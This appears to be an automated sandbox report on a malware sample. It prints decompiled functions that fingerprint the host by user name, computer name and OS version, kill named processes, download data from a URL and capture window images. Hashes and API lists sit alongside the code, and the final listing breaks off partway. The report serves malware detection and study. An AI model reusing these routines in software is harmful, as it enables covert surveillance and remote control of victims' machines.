Instruction ID: 45f089778c15165ebf2cbf604b9f5201d08664bf1ba3f91050c41e03a6275777
Opcode Fuzzy Hash: 6e4e64f918de46bf6b0dfa58b5e3006d314ddab6fd350da0c29bcec3d773154f
Instruction Fuzzy Hash: 1371E771600706AAEF24FB35DC42BBA7BE8EF49714F245439F909B7181EB70E94187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E88E00, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E88E00(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t43;
				signed int _t51;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t101;
				void* _t103;
				signed int _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t94 = __edi;
				_t43 =  *0xea9014; // 0xa413846
				 *(_t106 + 0x604) = _t43 ^ _t106;
				E00E8D0F0(__edi, _t106 + 0xf8, 0, 0x104);
				_t107 = _t106 + 0xc;
				E00E8D0F0(_t94, _t107 + 0x200, 0, 0x208);
				_t108 = _t107 + 0xc;
				E00E8D0F0(_t94, _t108 + 0x408, 0, 0x208);
				_t109 = _t108 + 0xc;
				 *(_t109 + 0x10) = 0x104;
				_t51 = 9;
				memset(_t109 + 0x14, 0, _t51 << 2);
				_t110 = _t109 + 0xc;
				E00E8D0F0(_t109 + 0x14 + _t51, _t110 + 0x60, 0, 0x9c);
				_t111 = _t110 + 0xc;
				GetUserNameW(_t111 + 0x204, _t111 + 0x10);
				 *(_t111 + 0x10) = 0x104;
				GetComputerNameW(_t111 + 0x40c, _t111 + 0x10);
				_t101 = E00E8ABA3(_t111 + 0x200);
				_t97 = E00E8ABA3(_t111 + 0x408);
				 *0xeaac44(_t111 + 0x14, __edi, __esi, _t103, __ebx);
				 *(_t111 + 0x58) = 0x9c;
				GetVersionExA(_t111 + 0x58);
				asm("movaps xmm0, [0xe7dd10]");
				_t88 = 0;
				asm("movups [esp+0x38], xmm0");
				 *((intOrPtr*)(_t111 + 0x48)) = 0x2f21742c;
				 *((intOrPtr*)(_t111 + 0x4c)) = 0x722a2671;
				 *(_t111 + 0x50) = 0x3f7f253c;
				 *((char*)(_t111 + 0x54)) = 0;
				do {
					_t24 = _t88 + 0x40; // 0x40
					 *(_t111 + _t88 + 0x38) =  *(_t111 + _t88 + 0x38) ^ _t24;
					_t88 = _t88 + 1;
				} while (_t88 < 0x1c);
				_t89 = 9;
				 *((char*)(_t111 + 0x54)) = 0;
				wsprintfA(_t111 + 0x118, _t111 + 0x50,  *((intOrPtr*)(_t111 + 0x74)),  *((intOrPtr*)(_t111 + 0x74)),  *(_t111 + 0xfc) & 0x0000ffff, 0 |  *((char*)(_t111 + 0xf6)) != 0x00000001, _t97, _t101, 0 |  *((intOrPtr*)(_t111 + 0x14)) == _t89);
				_t112 = _t111 + 0x24;
				E00E90985(E00E897E3(0x9c, _t111 + 0x11c, _t97, _t101, 0x104));
				return E00E8AE43( *(_t111 + 0x638) ^ _t112);
			}

0x00e88e00
0x00e88e06
0x00e88e0d
0x00e88e29
0x00e88e2e
0x00e88e40
0x00e88e45
0x00e88e52
0x00e88e57
0x00e88e5a
0x00e88e67
0x00e88e6e
0x00e88e6e
0x00e88e75
0x00e88e7a
0x00e88e8a
0x00e88e94
0x00e88ea1
0x00e88eba
0x00e88ec1
0x00e88ec8
0x00e88ed2
0x00e88ed7
0x00e88edd
0x00e88ee4
0x00e88ee6
0x00e88eeb
0x00e88ef3
0x00e88efb
0x00e88f03
0x00e88f08
0x00e88f08
0x00e88f0b
0x00e88f0f
0x00e88f10
0x00e88f17
0x00e88f1a
0x00e88f56
0x00e88f5c
0x00e88f6c
0x00e88f8a

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E88E8A
GetComputerNameW.KERNEL32 ref: 00E88EA1

Part of subcall function 00E8ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000208,0000009C,00E88EB3), ref: 00E8ABB7
Part of subcall function 00E8ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00E8ABE2

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E88EC8
GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E88ED7
wsprintfA.USER32 ref: 00E88F56

Strings

,t!/, xrefs: 00E88EEB
q&*r, xrefs: 00E88EF3
F8A/, xrefs: 00E88E06

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiNameWide$ComputerInfoNativeSystemUserVersionwsprintf
String ID: ,t!/$F8A/$q&*r
API String ID: 1366013575-1622808011
Opcode ID: b99adecd43cb4ee45bcc325ddcfab068c2a75e814c3f1020320408f86ca2b0df
Instruction ID: 743873adad635f86d745b87c8927782fe776b5e21ca1ddf7789b7cd509b93b23
Opcode Fuzzy Hash: b99adecd43cb4ee45bcc325ddcfab068c2a75e814c3f1020320408f86ca2b0df
Instruction Fuzzy Hash: 7D4192B24083859FD720EF60EC89BABBBEDEF85304F10092EF589D2151EB759548C762

Uniqueness

Uniqueness Score: -1.00%

Function 00E89907, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E89907(void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				signed int _v16;
				char _v280;
				long _v308;
				void* _v312;
				void* _v316;
				signed int _t11;
				int _t15;
				signed int _t16;
				int _t17;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				signed int _t35;

				_t37 = (_t35 & 0xfffffff8) - 0x130;
				_t11 =  *0xea9014; // 0xa413846
				_v8 = _t11 ^ (_t35 & 0xfffffff8) - 0x00000130;
				_t30 = CreateToolhelp32Snapshot(0xf, 0);
				_v312 = 0x128;
				_t15 = Process32First(_t30,  &_v312);
				L12:
				while(_t15 != 0) {
					_t24 = _a4;
					_t16 =  &_v280;
					while(1) {
						_t27 =  *_t16;
						if(_t27 !=  *_t24) {
							break;
						}
						if(_t27 == 0) {
							L6:
							_t17 = 0;
							L8:
							if(_t17 == 0) {
								_t34 = OpenProcess(1, _t17, _v308);
								if(_t34 != 0) {
									TerminateProcess(_t34, 9);
									CloseHandle(_t34);
								}
							}
							_t15 = Process32Next(_t30,  &_v316);
							goto L12;
						}
						_t28 =  *((intOrPtr*)(_t16 + 1));
						_t7 = _t24 + 1; // 0xded00528
						if(_t28 !=  *_t7) {
							break;
						}
						_t16 = _t16 + 2;
						_t24 = _t24 + 2;
						if(_t28 != 0) {
							continue;
						}
						goto L6;
					}
					asm("sbb eax, eax");
					_t17 = _t16 | 0x00000001;
					goto L8;
				}
				CloseHandle(_t30);
				return E00E8AE43(_v16 ^ _t37);
			}

0x00e8990d
0x00e89913
0x00e8991a
0x00e8992d
0x00e8992f
0x00e8993d
0x00000000
0x00e899a4
0x00e89945
0x00e89948
0x00e8994c
0x00e8994c
0x00e89950
0x00000000
0x00000000
0x00e89954
0x00e89968
0x00e89968
0x00e89971
0x00e89973
0x00e89982
0x00e89986
0x00e8998b
0x00e89992
0x00e89992
0x00e89986
0x00e8999e
0x00000000
0x00e8999e
0x00e89956
0x00e89959
0x00e8995c
0x00000000
0x00000000
0x00e8995e
0x00e89961
0x00e89966
0x00000000
0x00000000
0x00000000
0x00e89966
0x00e8996c
0x00e8996e
0x00000000
0x00e8996e
0x00e899a9
0x00e899c2

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00E89927
Process32First.KERNEL32(00000000,00000128), ref: 00E8993D
OpenProcess.KERNEL32(00000001,?,?), ref: 00E8997C
TerminateProcess.KERNEL32(00000000,00000009), ref: 00E8998B
CloseHandle.KERNEL32(00000000), ref: 00E89992
Process32Next.KERNEL32 ref: 00E8999E
CloseHandle.KERNEL32(00000000), ref: 00E899A9

Strings

F8A/, xrefs: 00E89913

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: F8A/
API String ID: 2696918072-73971870
Opcode ID: 4c0ff255429349d7750da439ede5e930a6d480a26c3929899edc2dbaac5d2a6f
Instruction ID: e06e2041a3f6e429345003e0c2f20f2cda50dc16ca1a5f68f85667b5a1bf8869
Opcode Fuzzy Hash: 4c0ff255429349d7750da439ede5e930a6d480a26c3929899edc2dbaac5d2a6f
Instruction Fuzzy Hash: B71106316082419FC321AF218C89BFB7BA9DB9A714F08445CF98DE6252E7319908C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D4D9, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E9D4D9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0xea9014; // 0xa413846
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00E9830D(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00E9830D(__ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0xe761b4; // 0x17
					E00E9D476(_t91, 0, "di�", _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E00E9CE10(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E00E9CEF6(_t91, _t99, __eflags,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E00E9D2FE(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								L23:
								return E00E8AE43(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E00E9DCF7(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xe940c5
							E00E9DCF7(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0xe94025
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xe940a5
							E00E952AD(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0xe7609c; // 0x41
						_t76 = E00E9D476(_t91, _t99, 0xe75d90, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E00E9CEF6(_t91, _t99, __eflags,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E00E9CE5B(_t91, _t99, _t123,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E00E9CE5B(_t91, _t99, _t119,  &_v20);
					goto L9;
				}
			}

0x00e9d4e1
0x00e9d4e8
0x00e9d4ef
0x00e9d4f3
0x00e9d4f7
0x00e9d505
0x00e9d50a
0x00e9d50b
0x00e9d50c
0x00e9d50d
0x00e9d515
0x00e9d517
0x00e9d51d
0x00e9d523
0x00e9d526
0x00e9d528
0x00e9d52b
0x00e9d52f
0x00e9d536
0x00e9d543
0x00e9d548
0x00e9d54b
0x00e9d54e
0x00e9d54e
0x00e9d550
0x00e9d553
0x00e9d557
0x00e9d5c7
0x00e9d5c9
0x00e9d5cb
0x00e9d5de
0x00e9d5de
0x00e9d5e5
0x00e9d5eb
0x00e9d5ee
0x00000000
0x00e9d5ee
0x00e9d5cd
0x00e9d5d0
0x00000000
0x00000000
0x00e9d5d6
0x00e9d5db
0x00000000
0x00e9d55e
0x00e9d55e
0x00e9d562
0x00e9d574
0x00e9d578
0x00e9d57d
0x00e9d581
0x00e9d582
0x00e9d60c
0x00e9d60c
0x00e9d60e
0x00e9d61a
0x00e9d624
0x00e9d628
0x00e9d62a
0x00e9d5f9
0x00e9d5fb
0x00e9d60b
0x00e9d60b
0x00e9d630
0x00e9d636
0x00e9d638
0x00000000
0x00000000
0x00e9d63f
0x00e9d645
0x00e9d647
0x00000000
0x00000000
0x00e9d649
0x00e9d64c
0x00e9d64e
0x00e9d650
0x00e9d650
0x00e9d661
0x00e9d666
0x00e9d668
0x00e9d6c8
0x00000000
0x00e9d6ca
0x00e9d66d
0x00e9d677
0x00e9d687
0x00e9d68d
0x00e9d68f
0x00000000
0x00000000
0x00e9d697
0x00e9d6a6
0x00e9d6ac
0x00e9d6ae
0x00000000
0x00000000
0x00e9d6b8
0x00e9d6c0
0x00000000
0x00e9d6c5
0x00e9d588
0x00e9d597
0x00e9d59c
0x00e9d5a1
0x00e9d5f1
0x00e9d5f1
0x00e9d5f1
0x00e9d5f3
0x00e9d5f7
0x00000000
0x00000000
0x00000000
0x00e9d5f7
0x00e9d5a3
0x00e9d5a5
0x00e9d5a9
0x00e9d5bb
0x00e9d5bf
0x00e9d5c4
0x00e9d5c4
0x00000000
0x00e9d5c4
0x00e9d5ab
0x00e9d5ae
0x00000000
0x00000000
0x00e9d5b4
0x00000000
0x00e9d5b4
0x00e9d564
0x00e9d567
0x00000000
0x00000000
0x00e9d56d
0x00000000
0x00e9d56d

APIs

Part of subcall function 00E9830D: GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
Part of subcall function 00E9830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

Part of subcall function 00E9830D: _free.LIBCMT ref: 00E9836F
Part of subcall function 00E9830D: _free.LIBCMT ref: 00E983A5

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 00E9D5E5
IsValidCodePage.KERNEL32(00000000), ref: 00E9D630
IsValidLocale.KERNEL32(?,00000001), ref: 00E9D63F
GetLocaleInfoW.KERNEL32(?,00001001,00E93FA5,00000040,?,00E940C5,00000055,00000000,?,?,00000055,00000000), ref: 00E9D687
GetLocaleInfoW.KERNEL32(?,00001002,00E94025,00000040), ref: 00E9D6A6

Strings

F8A/, xrefs: 00E9D4E1
di, xrefs: 00E9D53E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: F8A/$di
API String ID: 949163717-2366645898
Opcode ID: c52531d77ddcfb1ba061d08e8d51bd259aa455535f35e660055e8fcd0d167d9c
Instruction ID: 09a6a81f58f52e56d32ef2f3b07fd923516ce236bfb137f056f2842675d12bf7
Opcode Fuzzy Hash: c52531d77ddcfb1ba061d08e8d51bd259aa455535f35e660055e8fcd0d167d9c
Instruction Fuzzy Hash: 77517E71A04225EFDF10DFA9CC41ABE77B8AF09708F155429F914FB191EB709A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E889B2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00E889B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, char* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v72;
				char _v2005;
				intOrPtr _v2008;
				void _v2048;
				char _v2064;
				char _v2120;
				intOrPtr _v2124;
				void* _v2132;
				long _v2176;
				intOrPtr _v2188;
				void* _v2192;
				signed int _t26;
				char* _t51;
				char* _t53;
				void* _t60;
				char* _t63;
				void* _t64;
				void _t68;
				signed int _t70;

				_t70 =  &_v2132;
				_t26 =  *0xea9014; // 0xa413846
				_v4 = _t26 ^ _t70;
				asm("movaps xmm0, [0xe7dc00]");
				asm("movups [esp+0xc], xmm0");
				asm("movaps xmm0, [0xe7dd50]");
				_t51 = 0;
				asm("movups [esp+0x20], xmm0");
				_t53 = 0;
				_v2124 = _a8;
				asm("movaps xmm0, [0xe7dd80]");
				asm("movups [esp+0x30], xmm0");
				asm("movaps xmm0, [0xe7dd70]");
				_t68 = 0;
				asm("movups [esp+0x44], xmm0");
				asm("movaps xmm0, [0xe7df10]");
				_t63 = _a4;
				asm("movups [esp+0x58], xmm0");
				asm("movaps xmm0, [0xe7df20]");
				asm("movups [esp+0x6c], xmm0");
				_v2132 = 0;
				asm("movaps xmm0, [0xe7df00]");
				asm("movups [esp+0x7c], xmm0");
				_v2008 = 0x84829e;
				do {
					_t7 = _t53 + 0x40; // 0x40
					 *(_t70 + _t53 + 0x1c) =  *(_t70 + _t53 + 0x1c) ^ _t7;
					_t53 = _t53 + 1;
				} while (_t53 < 0x73);
				_v2005 = 0;
				_t60 = InternetOpenA( &_v2120, 0, 0, 0, 0);
				if(_t60 != 0) {
					_t64 = InternetOpenUrlA(_t60, _t63, 0, 0, 0x84000000, 0);
					__eflags = _t64;
					if(__eflags != 0) {
						do {
							InternetReadFile(_t64,  &_v2048, 0x7d0,  &_v2176);
							_push(_v2192 + _t68);
							_v2188 = E00E8B0B6(__edx, __eflags);
							E00E8D670(_t38, _t51, _t68);
							E00E8D670(_v2188 + _t68,  &_v2064, _v2192);
							L00E8AE54(_t51);
							_t68 = _v2192 + _t68;
							_t70 = _t70 + 0x20;
							__eflags = _v2192;
							_t51 = _v2188;
						} while (__eflags != 0);
						InternetCloseHandle(_t64);
						InternetCloseHandle(_t60);
						 *_v2192 = _t68;
					} else {
						InternetCloseHandle(_t60);
						goto L3;
					}
				} else {
					L3:
				}
				return E00E8AE43(_v72 ^ _t70);
			}

0x00e889b2
0x00e889b8
0x00e889bf
0x00e889c6
0x00e889d4
0x00e889da
0x00e889e1
0x00e889e3
0x00e889e8
0x00e889ea
0x00e889ee
0x00e889f5
0x00e889fb
0x00e88a02
0x00e88a04
0x00e88a0a
0x00e88a11
0x00e88a18
0x00e88a1e
0x00e88a25
0x00e88a2a
0x00e88a2e
0x00e88a35
0x00e88a3a
0x00e88a45
0x00e88a45
0x00e88a48
0x00e88a4c
0x00e88a4d
0x00e88a5a
0x00e88a68
0x00e88a6c
0x00e88a85
0x00e88a87
0x00e88a89
0x00e88a94
0x00e88aa7
0x00e88ab3
0x00e88abc
0x00e88ac0
0x00e88ad8
0x00e88ade
0x00e88ae3
0x00e88ae7
0x00e88aea
0x00e88aef
0x00e88aef
0x00e88afc
0x00e88aff
0x00e88b05
0x00e88a8b
0x00e88a8c
0x00000000
0x00e88a8c
0x00e88a6e
0x00e88a6e
0x00e88a6e
0x00e88b21

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00E88A62
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000000,00000000), ref: 00E88A7F
InternetCloseHandle.WININET(00000000), ref: 00E88A8C
InternetReadFile.WININET(00000000,?,000007D0,?), ref: 00E88AA7
InternetCloseHandle.WININET(00000000), ref: 00E88AFC
InternetCloseHandle.WININET(00000000), ref: 00E88AFF

Strings

F8A/, xrefs: 00E889B8

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID: F8A/
API String ID: 4294395943-73971870
Opcode ID: e52d73100d327e85805fb65e1c4c65e49429b7ab95727220d525d753db2019b6
Instruction ID: 277d2acfb809c73df3983ba804d581ff7d4c6804d4dff902d3533970000e4512
Opcode Fuzzy Hash: e52d73100d327e85805fb65e1c4c65e49429b7ab95727220d525d753db2019b6
Instruction Fuzzy Hash: 014163719087449FD311DF29DD40AABB7E8FF99308F01591DF9CC72121EB30A9888B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E84383, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E84383(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr* _a8) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t10;
				intOrPtr* _t34;
				struct HWND__* _t36;
				signed int _t37;

				_t10 =  *0xea9014; // 0xa413846
				_v8 = _t10 ^ _t37;
				_t36 = _a4;
				_t34 = _a8;
				if(IsWindowVisible(_t36) != 0) {
					E00E842A8(__ebx, _t36,  *_t34, _t34, _t36, _t37,  *((intOrPtr*)(_t34 + 4)));
					SetWindowLongA(_t36, 0xfffffff0, GetWindowLongA(_t36, 0xfffffff0));
					E00E8D0F0(_t34,  &(_v156.dwMajorVersion), 0, 0x90);
					_v156.dwOSVersionInfoSize = 0x94;
					GetVersionExA( &_v156);
					if(_v156.dwMajorVersion < 6 && GetTopWindow(_t36) != 0) {
						E00E8435D(_t34, _t23);
					}
				}
				return E00E8AE43(_v8 ^ _t37);
			}

0x00e8438c
0x00e84393
0x00e84397
0x00e8439b
0x00e843a7
0x00e843b0
0x00e843c3
0x00e843d7
0x00e843df
0x00e843f0
0x00e843fd
0x00e8440e
0x00e8440e
0x00e843fd
0x00e84423

APIs

IsWindowVisible.USER32 ref: 00E8439F

Part of subcall function 00E842A8: GetWindowRect.USER32 ref: 00E842CE
Part of subcall function 00E842A8: CreateCompatibleDC.GDI32 ref: 00E842D5
Part of subcall function 00E842A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00E842F0
Part of subcall function 00E842A8: SelectObject.GDI32(00000000,00000000), ref: 00E842FA
Part of subcall function 00E842A8: PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00E843B5,?), ref: 00E84303
Part of subcall function 00E842A8: BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00E84333
Part of subcall function 00E842A8: DeleteObject.GDI32(00000000), ref: 00E8433B
Part of subcall function 00E842A8: DeleteDC.GDI32(00000000), ref: 00E84342

GetWindowLongA.USER32 ref: 00E843B9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00E843C3
GetVersionExA.KERNEL32(00000094), ref: 00E843F0
GetTopWindow.USER32 ref: 00E84400

Part of subcall function 00E8435D: GetWindow.USER32(00000000,00000001), ref: 00E84374

Strings

F8A/, xrefs: 00E8438C

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
String ID: F8A/
API String ID: 567582119-73971870
Opcode ID: cd32d8c8b849d0c3957530032467d01189067f6c75ac087904f57916ac3dc46d
Instruction ID: b3ffd615d26edefa74e7a269c36f577be8f896cddc2d29b13242daa3f6821bf4
Opcode Fuzzy Hash: cd32d8c8b849d0c3957530032467d01189067f6c75ac087904f57916ac3dc46d
Instruction Fuzzy Hash: 25118EB1604115AFEB10EB75EC05F9E73A8EF4A310F104125F52DB62D1DB34EA4A8BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D2FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E9D2FE(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0x51ceb70f
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00E96417(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0x51ceb70f
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00e9d303
0x00e9d304
0x00e9d30b
0x00e9d3af
0x00e9d3bd
0x00e9d3c8
0x00e9d3ce
0x00e9d3d3
0x00e9d3d5
0x00e9d3d5
0x00e9d3db
0x00e9d3e0
0x00e9d3e0
0x00e9d3ca
0x00e9d3ca
0x00000000
0x00e9d3ca
0x00e9d311
0x00e9d316
0x00000000
0x00000000
0x00e9d31c
0x00e9d321
0x00e9d323
0x00e9d323
0x00e9d329
0x00000000
0x00000000
0x00e9d32e
0x00e9d345
0x00e9d345
0x00e9d34e
0x00e9d350
